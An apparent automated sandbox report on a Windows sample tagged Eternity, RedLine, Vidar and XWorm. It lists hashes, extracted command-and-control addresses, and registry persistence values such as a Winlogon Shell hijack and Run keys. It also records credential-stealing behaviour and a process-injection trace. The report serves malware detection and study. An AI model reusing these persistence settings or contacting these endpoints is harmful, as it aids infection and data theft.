eternity | 45afb3a562e84e75c19fe08404921b2c05900a6037f04d5aa61eca9ea7254ef3

Resubmissions

07-05-2023 15:41

230507-s4qhgafb29 10

05-05-2023 11:17

230505-nd1tashf52 10

05-05-2023 11:13

230505-nbg86she96 10

Analysis

max time kernel
1200s
max time network
1183s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
05-05-2023 11:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

77777.exe
Size

1.7MB
MD5

4f24c94182a964c6706c1920a73822c0
SHA1

5fd5f215270c5f7ff7828d8e1fe7e784094ae2f0
SHA256

45afb3a562e84e75c19fe08404921b2c05900a6037f04d5aa61eca9ea7254ef3
SHA512

d1f7d8b5b6f1f3464a2946b861bc7c919623ad3fddeb7899d546fae93f6d864fd614a88b043c46d990942eaf59076a72702ad17dca26b178c8312c75219ce1fd
SSDEEP

49152:zsRpndZn496l3tGPHbbe2q6d5axY5zGbpSFUxTJ:zsRfZn4gVKeOwozwRv

Score

10^/10

eternity redline vidar xworm 9bd43ccedb1e82a38795147b462c1fe9 collection discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

vidar

Version

3.6

Botnet

9bd43ccedb1e82a38795147b462c1fe9

https://steamcommunity.com/profiles/76561199499188534

https://t.me/nutalse

Attributes

profile_id_v2
9bd43ccedb1e82a38795147b462c1fe9
user_agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36

Extracted

Family

eternity

http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion

Signatures

Detects Redline Stealer samples 4 IoCs

This rule detects the presence of Redline Stealer samples based on their unique strings.

stealer

resource	yara_rule
behavioral1/memory/3524-179-0x0000000007530000-0x0000000007B58000-memory.dmp	redline_stealer
behavioral1/memory/3524-184-0x0000000007D40000-0x0000000007DA6000-memory.dmp	redline_stealer
behavioral1/files/0x000600000001af18-1088.dat	redline_stealer
behavioral1/files/0x000600000001af18-1089.dat	redline_stealer

Detects any file with a triage score of 10 6 IoCs

This file has been assigned a triage score of 10, indicating a high likelihood of malicious behavior.

resource	yara_rule
behavioral1/files/0x000600000001af06-329.dat	triage_score_10
behavioral1/files/0x000600000001af06-330.dat	triage_score_10
behavioral1/memory/2228-334-0x0000000000280000-0x0000000000C3E000-memory.dmp	triage_score_10
behavioral1/memory/2228-406-0x0000000023250000-0x0000000024687000-memory.dmp	triage_score_10
behavioral1/files/0x000600000001af18-1088.dat	triage_score_10
behavioral1/files/0x000600000001af18-1089.dat	triage_score_10

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Windows\\system32\\svchost.exe.exe,"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 4532 created 3148	4532	95602302436173465811.exe	47
PID 4532 created 3148	4532	95602302436173465811.exe	47
PID 4532 created 3148	4532	95602302436173465811.exe	47
PID 4532 created 3148	4532	95602302436173465811.exe	47
PID 4888 created 4820	4888	svchost.exe	186

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wraper\\rdpwrap.dll"	attrib.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 20 IoCs

pid	Process
4728	Engine.exe
1000	Bondage.exe.pif
5060	Bondage.exe.pif
2228	84222742281740935377.exe
8	80455598848292478873.exe
4744	98868983669815794021.exe
4532	95602302436173465811.exe
1384	09043308113708478059.exe
2376	a0d660e2-0356-487a-a353-a067ea0c9458.exe
732	npp.8.4.7.Installer.x64.exe
4356	Prague.exe.pif
2680	zeron.exe
404	Fireplace.exe.com
2980	zeron.exe
4984	Fireplace.exe.com
4188	Fireplace.exe.com
620	zeron.exe
4320	Fireplace.exe.com
4636	Fireplace.exe.com
4720	zeron.exe

Loads dropped DLL 10 IoCs

pid	Process
5060	Bondage.exe.pif
5060	Bondage.exe.pif
732	npp.8.4.7.Installer.x64.exe
732	npp.8.4.7.Installer.x64.exe
732	npp.8.4.7.Installer.x64.exe
732	npp.8.4.7.Installer.x64.exe
2680	zeron.exe
2980	zeron.exe
620	zeron.exe
4720	zeron.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	09043308113708478059.exe
Key opened	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	09043308113708478059.exe
Key opened	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	09043308113708478059.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\asdfasdlkfjsdkfasdfnkjlsadnfsadf = "C:\\Users\\Admin\\AppData\\Roaming\\asdfasdlkfjsdkfasdfnkjlsadnfsadf\\asdfasdlkfjsdkfasdfnkjlsadnfsadf.exe"	98868983669815794021.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	a0d660e2-0356-487a-a353-a067ea0c9458.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	a0d660e2-0356-487a-a353-a067ea0c9458.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	bcastdvr.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
53	ip-api.com

Drops file in System32 directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V0100001.log	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Google Crash Handler	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1000 set thread context of 5060	1000	Bondage.exe.pif	80
PID 4356 set thread context of 1924	4356	Prague.exe.pif	123
PID 4356 set thread context of 2072	4356	Prague.exe.pif	151
PID 4532 set thread context of 4316	4532	95602302436173465811.exe	177
PID 4356 set thread context of 3108	4356	Prague.exe.pif	189

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wraper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files\RDP Wraper\	attrib.exe
File opened for modification	C:\Program Files\RDP Wraper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\RDP Wraper\rdpwrap.ini	attrib.exe
File created	C:\Program Files\Google\Chrome\GoogleCrashHandler.exe	95602302436173465811.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	DllHost.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
820	sc.exe
4300	sc.exe
3372	sc.exe
1060	sc.exe
2520	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
452	2680	WerFault.exe	119
2904	4604	WerFault.exe	56
5104	4040	WerFault.exe	49
4964	4820	WerFault.exe	186
4204	2980	WerFault.exe	197
4164	620	WerFault.exe	203
4140	4720	WerFault.exe	213

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	GamePanel.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	GamePanel.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	GamePanel.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	GamePanel.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	09043308113708478059.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	attrib.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	attrib.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	bcastdvr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	bcastdvr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Bondage.exe.pif
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Bondage.exe.pif
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	09043308113708478059.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4824	schtasks.exe
4972	schtasks.exe
4032	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4328	timeout.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4940	systeminfo.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,41484365,39965824,7153487,17110988,17962391,17962392,3702920,3462423,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617,17110992"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
4488	PING.EXE
4340	PING.EXE
5040	PING.EXE
2284	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3524	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
5060	Bondage.exe.pif
5060	Bondage.exe.pif
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe
2228	84222742281740935377.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3148	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	3108	powershell.exe
Token: SeDebugPrivilege	2228	84222742281740935377.exe
Token: SeDebugPrivilege	4744	98868983669815794021.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	1384	09043308113708478059.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	2680	zeron.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	powershell.exe
Token: SeSecurityPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	936	powershell.exe
Token: SeLoadDriverPrivilege	936	powershell.exe
Token: SeSystemProfilePrivilege	936	powershell.exe
Token: SeSystemtimePrivilege	936	powershell.exe
Token: SeProfSingleProcessPrivilege	936	powershell.exe
Token: SeIncBasePriorityPrivilege	936	powershell.exe
Token: SeCreatePagefilePrivilege	936	powershell.exe
Token: SeBackupPrivilege	936	powershell.exe
Token: SeRestorePrivilege	936	powershell.exe
Token: SeShutdownPrivilege	936	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeSystemEnvironmentPrivilege	936	powershell.exe
Token: SeRemoteShutdownPrivilege	936	powershell.exe
Token: SeUndockPrivilege	936	powershell.exe
Token: SeManageVolumePrivilege	936	powershell.exe
Token: 33	936	powershell.exe
Token: 34	936	powershell.exe
Token: 35	936	powershell.exe
Token: 36	936	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	powershell.exe
Token: SeSecurityPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	936	powershell.exe
Token: SeLoadDriverPrivilege	936	powershell.exe
Token: SeSystemProfilePrivilege	936	powershell.exe
Token: SeSystemtimePrivilege	936	powershell.exe
Token: SeProfSingleProcessPrivilege	936	powershell.exe
Token: SeIncBasePriorityPrivilege	936	powershell.exe
Token: SeCreatePagefilePrivilege	936	powershell.exe
Token: SeBackupPrivilege	936	powershell.exe
Token: SeRestorePrivilege	936	powershell.exe
Token: SeShutdownPrivilege	936	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeSystemEnvironmentPrivilege	936	powershell.exe
Token: SeRemoteShutdownPrivilege	936	powershell.exe
Token: SeUndockPrivilege	936	powershell.exe
Token: SeManageVolumePrivilege	936	powershell.exe
Token: 33	936	powershell.exe
Token: 34	936	powershell.exe
Token: 35	936	powershell.exe
Token: 36	936	powershell.exe
Token: SeIncreaseQuotaPrivilege	936	powershell.exe
Token: SeSecurityPrivilege	936	powershell.exe
Token: SeTakeOwnershipPrivilege	936	powershell.exe
Token: SeLoadDriverPrivilege	936	powershell.exe
Token: SeSystemProfilePrivilege	936	powershell.exe
Token: SeSystemtimePrivilege	936	powershell.exe
Token: SeProfSingleProcessPrivilege	936	powershell.exe
Token: SeIncBasePriorityPrivilege	936	powershell.exe
Token: SeCreatePagefilePrivilege	936	powershell.exe
Token: SeBackupPrivilege	936	powershell.exe
Token: SeRestorePrivilege	936	powershell.exe
Token: SeShutdownPrivilege	936	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
4356	Prague.exe.pif
4356	Prague.exe.pif
4356	Prague.exe.pif
404	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
404	Fireplace.exe.com
404	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
4984	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4984	Fireplace.exe.com
4984	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4188	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4188	Fireplace.exe.com
4188	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
1008	dwm.exe
1008	dwm.exe
4320	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4320	Fireplace.exe.com
4320	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4636	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
4636	Fireplace.exe.com
4636	Fireplace.exe.com
3148	Explorer.EXE
3148	Explorer.EXE
1008	dwm.exe
1008	dwm.exe

Suspicious use of SendNotifyMessage 21 IoCs

pid	Process
1000	Bondage.exe.pif
1000	Bondage.exe.pif
1000	Bondage.exe.pif
4356	Prague.exe.pif
4356	Prague.exe.pif
4356	Prague.exe.pif
404	Fireplace.exe.com
404	Fireplace.exe.com
404	Fireplace.exe.com
4984	Fireplace.exe.com
4984	Fireplace.exe.com
4984	Fireplace.exe.com
4188	Fireplace.exe.com
4188	Fireplace.exe.com
4188	Fireplace.exe.com
4320	Fireplace.exe.com
4320	Fireplace.exe.com
4320	Fireplace.exe.com
4636	Fireplace.exe.com
4636	Fireplace.exe.com
4636	Fireplace.exe.com

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
8	80455598848292478873.exe
2376	a0d660e2-0356-487a-a353-a067ea0c9458.exe
732	npp.8.4.7.Installer.x64.exe
4356	Prague.exe.pif
3372	Conhost.exe
5028	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4192 wrote to memory of 4728	4192	77777.exe	66
PID 4192 wrote to memory of 4728	4192	77777.exe	66
PID 4192 wrote to memory of 4728	4192	77777.exe	66
PID 4728 wrote to memory of 4940	4728	Engine.exe	67
PID 4728 wrote to memory of 4940	4728	Engine.exe	67
PID 4728 wrote to memory of 4940	4728	Engine.exe	67
PID 4940 wrote to memory of 3824	4940	cmd.exe	69
PID 4940 wrote to memory of 3824	4940	cmd.exe	69
PID 4940 wrote to memory of 3824	4940	cmd.exe	69
PID 3824 wrote to memory of 3524	3824	cmd.exe	72
PID 3824 wrote to memory of 3524	3824	cmd.exe	72
PID 3824 wrote to memory of 3524	3824	cmd.exe	72
PID 3824 wrote to memory of 3108	3824	cmd.exe	74
PID 3824 wrote to memory of 3108	3824	cmd.exe	74
PID 3824 wrote to memory of 3108	3824	cmd.exe	74
PID 3824 wrote to memory of 5088	3824	cmd.exe	75
PID 3824 wrote to memory of 5088	3824	cmd.exe	75
PID 3824 wrote to memory of 5088	3824	cmd.exe	75
PID 3824 wrote to memory of 1000	3824	cmd.exe	76
PID 3824 wrote to memory of 1000	3824	cmd.exe	76
PID 3824 wrote to memory of 1000	3824	cmd.exe	76
PID 3824 wrote to memory of 5040	3824	cmd.exe	77
PID 3824 wrote to memory of 5040	3824	cmd.exe	77
PID 3824 wrote to memory of 5040	3824	cmd.exe	77
PID 1000 wrote to memory of 4032	1000	Bondage.exe.pif	78
PID 1000 wrote to memory of 4032	1000	Bondage.exe.pif	78
PID 1000 wrote to memory of 4032	1000	Bondage.exe.pif	78
PID 1000 wrote to memory of 5060	1000	Bondage.exe.pif	80
PID 1000 wrote to memory of 5060	1000	Bondage.exe.pif	80
PID 1000 wrote to memory of 5060	1000	Bondage.exe.pif	80
PID 1000 wrote to memory of 5060	1000	Bondage.exe.pif	80
PID 1000 wrote to memory of 5060	1000	Bondage.exe.pif	80
PID 5060 wrote to memory of 2228	5060	Bondage.exe.pif	82
PID 5060 wrote to memory of 2228	5060	Bondage.exe.pif	82
PID 5060 wrote to memory of 8	5060	Bondage.exe.pif	84
PID 5060 wrote to memory of 8	5060	Bondage.exe.pif	84
PID 5060 wrote to memory of 8	5060	Bondage.exe.pif	84
PID 5060 wrote to memory of 4744	5060	Bondage.exe.pif	85
PID 5060 wrote to memory of 4744	5060	Bondage.exe.pif	85
PID 8 wrote to memory of 2816	8	80455598848292478873.exe	86
PID 8 wrote to memory of 2816	8	80455598848292478873.exe	86
PID 8 wrote to memory of 2816	8	80455598848292478873.exe	86
PID 5060 wrote to memory of 4532	5060	Bondage.exe.pif	88
PID 5060 wrote to memory of 4532	5060	Bondage.exe.pif	88
PID 5060 wrote to memory of 1384	5060	Bondage.exe.pif	89
PID 5060 wrote to memory of 1384	5060	Bondage.exe.pif	89
PID 5060 wrote to memory of 3284	5060	Bondage.exe.pif	90
PID 5060 wrote to memory of 3284	5060	Bondage.exe.pif	90
PID 5060 wrote to memory of 3284	5060	Bondage.exe.pif	90
PID 3284 wrote to memory of 4328	3284	cmd.exe	92
PID 3284 wrote to memory of 4328	3284	cmd.exe	92
PID 3284 wrote to memory of 4328	3284	cmd.exe	92
PID 1384 wrote to memory of 4968	1384	09043308113708478059.exe	93
PID 1384 wrote to memory of 4968	1384	09043308113708478059.exe	93
PID 4968 wrote to memory of 3196	4968	cmd.exe	95
PID 4968 wrote to memory of 3196	4968	cmd.exe	95
PID 4968 wrote to memory of 1196	4968	cmd.exe	96
PID 4968 wrote to memory of 1196	4968	cmd.exe	96
PID 4968 wrote to memory of 848	4968	cmd.exe	97
PID 4968 wrote to memory of 848	4968	cmd.exe	97
PID 1384 wrote to memory of 224	1384	09043308113708478059.exe	98
PID 1384 wrote to memory of 224	1384	09043308113708478059.exe	98
PID 224 wrote to memory of 2700	224	cmd.exe	100
PID 224 wrote to memory of 2700	224	cmd.exe	100

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1924	attrib.exe
2072	attrib.exe
3108	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	09043308113708478059.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	09043308113708478059.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1008

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
